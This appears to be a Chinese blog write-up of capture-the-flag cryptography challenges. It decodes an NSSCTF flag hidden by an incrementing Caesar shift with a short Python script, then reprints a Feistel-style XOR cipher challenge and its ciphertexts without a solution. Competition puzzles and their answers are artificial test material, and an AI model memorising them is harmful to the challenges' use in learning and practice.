000100101812DC2 (Device Control 2)设备控制2
000100111913DC3/XOFF (Device Control 3/Transmission Off)设备控制3/传输中断
000101002014DC4 (Device Control 4)设备控制4
000101012115NAK (Negative Acknowledge)无响应/非正常响应/拒绝接收
000101102216SYN (Synchronous Idle)同步空闲
000101112317ETB (End of Transmission Block)传输块结束/块传输终止
000110002418CAN (Cancel)取消
000110012519EM (End of Medium)已到介质末端/介质存储已满/介质中断
00011010261ASUB (Substitute)替补/替换
00011011271BESC (Escape)逃离/取消
00011100281CFS (File Separator)文件分割符
00011101291DGS (Group Separator)组分隔符/分组符
00011110301ERS (Record Separator)记录分离符
00011111311FUS (Unit Separator)单元分隔符
001000003220(Space)空格
001000013321!
001000103422"
001000113523#
001001003624$
001001013725%
001001103826&
001001113927'
001010004028(
001010014129)
00101010422A*
00101011432B+
00101100442C,
00101101452D-
00101110462E.
00101111472F/
0011000048300
0011000149311
0011001050322
0011001151333
0011010052344
0011010153355
0011011054366
0011011155377
0011100056388
0011100157399
00111010583A:
00111011593B;
00111100603C<
00111101613D=
00111110623E>
00111111633F?
010000006440@
010000016541A
010000106642B
010000116743C
010001006844D
010001016945E
010001107046F
010001117147G
010010007248H
010010017349I
01001010744AJ
01001011754BK
01001100764CL
01001101774DM
01001110784EN
01001111794FO
010100008050P
010100018151Q
010100108252R
010100118353S
010101008454T
010101018555U
010101108656V
010101118757W
010110008858X
010110018959Y
01011010905AZ
01011011915B[
01011100925C**
01011101935D]
01011110945E^
01011111955F_
011000009660`
011000019761a
011000109862b
011000119963c
0110010010064d
0110010110165e
0110011010266f
0110011110367g
0110100010468h
0110100110569i
011010101066Aj
011010111076Bk
011011001086Cl
011011011096Dm
011011101106En
011011111116Fo
0111000011270p
0111000111371q
0111001011472r
0111001111573s
0111010011674t
0111010111775u
0111011011876v
0111011111977w
0111100012078x
0111100112179y
011110101227Az
011110111237B{
011111001247C
011111011257D}
011111101267E~
011111111277FDEL (Delete)删除
[73, 77, 76, 59, 75, 60, 112, 71, 103, 100, 82, 94, 40, 83, 76, 47, 76, 79, 92, 73, 89, 99]

image-20220403174912165

可以大胆的猜一下,这个flag是以NSSCTF开头的,然后接着对照其他字符

第二位和第三位的ascii码不一样,这就说明不是简单的位移关系,而是存在某个公式

73+5=78=N

77+6=83=S

76+7=83=S

59+8=67=C

想必写到这里就不用再写下去了,是一个偏移量为n+4的位移方式

写出脚本如下

# enc = r'NRQ;P<uLliW^(XQ/QT\NDh'
enc = r'IML;K<pGgdR^(SL/LO\IYc'
flag = ''
ascii = []
caeser = 5
for i in enc:
    # ascii.append(ord(i))
    # print(ascii)
    flag += chr(ord(i) + caeser)
    caeser+=1
print(flag)

image-20220403175400221

xor

题目

import os
import base64
from Crypto.Util import number, strxor

# from flag import flag

flag = 'xxxxxxxxxxxxxxxxxx'


# 返回八个16bite
def gen_key():
    return [os.urandom(16) for _ in range(8)]


def rnd(b: bytes, k: bytes):
    l = b[:16]  # 左边16位
    r = b[16:]     # 右边16位
    _r = l      # _r位右边16位
    _l = strxor.strxor(strxor.strxor(r, k), l)      # 右边16位与k(16位)先异或,再将异或得到的结果与左边16位异或
    return _l + _r      # 返回右边16位加上异或得到的最终结果相加


def enc(b: bytes, ks):
    c = b
    for i in range(8):
        c = rnd(c, ks[i])
    return c


if __name__ == '__main__':
    a = os.urandom(32)  # 获取32位bite,并赋值给a
    ks = gen_key()  # 获取八个16bite,作为密钥
    enc_a = enc(a, ks)  # 密文a:将32bite持续与16bite进行rnd加密8次
    enc_flag = enc(flag.encode(), ks) # 密文flag:将flag执行同样的流程
    print(base64.b64encode(a).decode())
    print(base64.b64encode(enc_a).decode())
    print(base64.b64encode(enc_flag).decode())

# i03yXzXWe4QTiwJHlUZo6iqEdDkwJVviSOQ7CM3vJmM=
# 4EnYOhbivTMP5r4VYLA8cwJBFTXIeeKAoNf/3ctgLLA=
# +qyVMEei1eN3YbV/z2kjcaCKngWc2pW2/e7HwpXKaj0=

public


rrssaa2

rrssaa1

最后修改:2022 年 07 月 25 日
如果觉得我的文章对你有用,请随意赞赏